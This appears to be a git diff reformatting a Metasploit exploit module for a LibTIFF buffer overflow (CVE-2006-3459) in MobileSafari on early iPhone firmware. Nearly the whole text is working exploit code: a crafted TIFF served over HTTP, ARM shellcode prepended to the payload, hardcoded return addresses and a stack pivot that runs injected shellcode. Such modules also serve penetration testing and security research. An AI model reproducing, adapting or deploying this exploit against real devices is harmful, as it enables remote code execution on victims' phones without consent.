L-codes
diff --git a/‎modules/exploits/apple_ios/browser/safari_libtiff.rb‎
Lines changed: 61 additions & 60 deletions b/‎modules/exploits/apple_ios/browser/safari_libtiff.rb‎
Lines changed: 61 additions & 60 deletions
@@ -12,71 +12,74 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the version of
-        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
-        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
-        tools installed will need to use a special payload.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>  ['hdm', 'kf'],
-      'References'     =>
-        [
+          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
+          1.1.1 of the Apple iPhone. iPhones which have not had the BSD
+          tools installed will need to use a special payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['hdm', 'kf'],
+        'References' => [
           ['CVE', '2006-3459'],
           ['OSVDB', '27723'],
           ['BID', '19283']
         ],
-      'Payload'        =>
-        {
-          'Space'    => 1800,
-          'BadChars' => "",
+        'Payload' => {
+          'Space' => 1800,
+          'BadChars' => '',
 
           # Multi-threaded applications are not allowed to execve() on OS X
           # This stub injects a vfork/exit in front of the payload
-          'Prepend'  =>
-            [
-              0xe3a0c042, # vfork
-              0xef000080, # sc
-              0xe3500000, # cmp r0, #0
-              0x1a000001, # bne
-              0xe3a0c001, # exit(0)
-              0xef000080  # sc
-            ].pack("V*")
+          'Prepend' =>
+              [
+                0xe3a0c042, # vfork
+                0xef000080, # sc
+                0xe3500000, # cmp r0, #0
+                0x1a000001, # bne
+                0xe3a0c001, # exit(0)
+                0xef000080  # sc
+              ].pack('V*')
         },
-      'Arch'           => ARCH_ARMLE,
-      'Platform'       => %w{ osx },
-      'Targets'        =>
-        [
-
-          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
+        'Arch' => ARCH_ARMLE,
+        'Platform' => %w[osx],
+        'Targets' => [
+          [
+            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
             {
               'Platform' => 'osx',
 
               # Scratch space for our shellcode and stack
-              'Heap'     => 0x00802000,
+              'Heap' => 0x00802000,
 
               # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
-              'Magic'    => 0x300d562c,
+              'Magic' => 0x300d562c
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-08-01'
-      ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-08-01',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
   end
 
-  def on_request_uri(cli, req)
-
-
+  def on_request_uri(cli, _req)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if (p = regenerate_payload(cli)).nil?
 
     # Grab reference to the target
     t = target
 
-    print_status("Sending exploit")
+    print_status('Sending exploit')
 
     # Transmit the compressed response to the client
     send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
@@ -85,44 +88,42 @@ def on_request_uri(cli, req)
     handler(cli)
   end
 
-  def generate_tiff(code, targ)
-
+  def generate_tiff(_code, targ)
     #
     # This is a TIFF file, we have a huge range of evasion
     # capabilities, but for now, we don't use them.
     #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
     #
 
     lolz = 2048
-    tiff =
-      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
-      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
-      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
-      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
-      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
-      [lolz].pack("V") +
-      "\x84\x00\x00\x00\x00\x00\x00\x00"
+    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"
+    tiff << [lolz].pack('V')
+    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"
 
     # Randomize the bajeezus out of our data
     hehe = rand_text(lolz)
 
     # Were going to candy mountain!
-    hehe[120, 4] = [targ['Magic']].pack("V")
+    hehe[120, 4] = [targ['Magic']].pack('V')
 
     # >> add r0, r4, #0x30
-    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')
 
     # Candy mountain, Charlie!
     # >> mov r1, sp
 
     # It will be an adventure!
     # >> mov r2, r8
-    hehe[ 92, 4] = [ hehe.length ].pack("V")
+    hehe[92, 4] = [ hehe.length ].pack('V')
 
     # Its a magic leoplurodon!
     # It has spoken!
@@ -147,7 +148,7 @@ def generate_tiff(code, targ)
     # We made it to candy mountain!
     # Go inside Charlie!
     # sub sp, r7, #0x14
-    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')
 
     # Goodbye Charlie!
     # ;; targ['Heap'] + 0x48 becomes the stack pointer
@@ -157,7 +158,7 @@ def generate_tiff(code, targ)
     # >> ldmia sp!, {r4, r5, r6, r7, pc}
 
     # Return back to the copied heap data
-    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
+    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')
 
     # Insert our actual shellcode at heap location + 196
     hehe[196, payload.encoded.length] = payload.encoded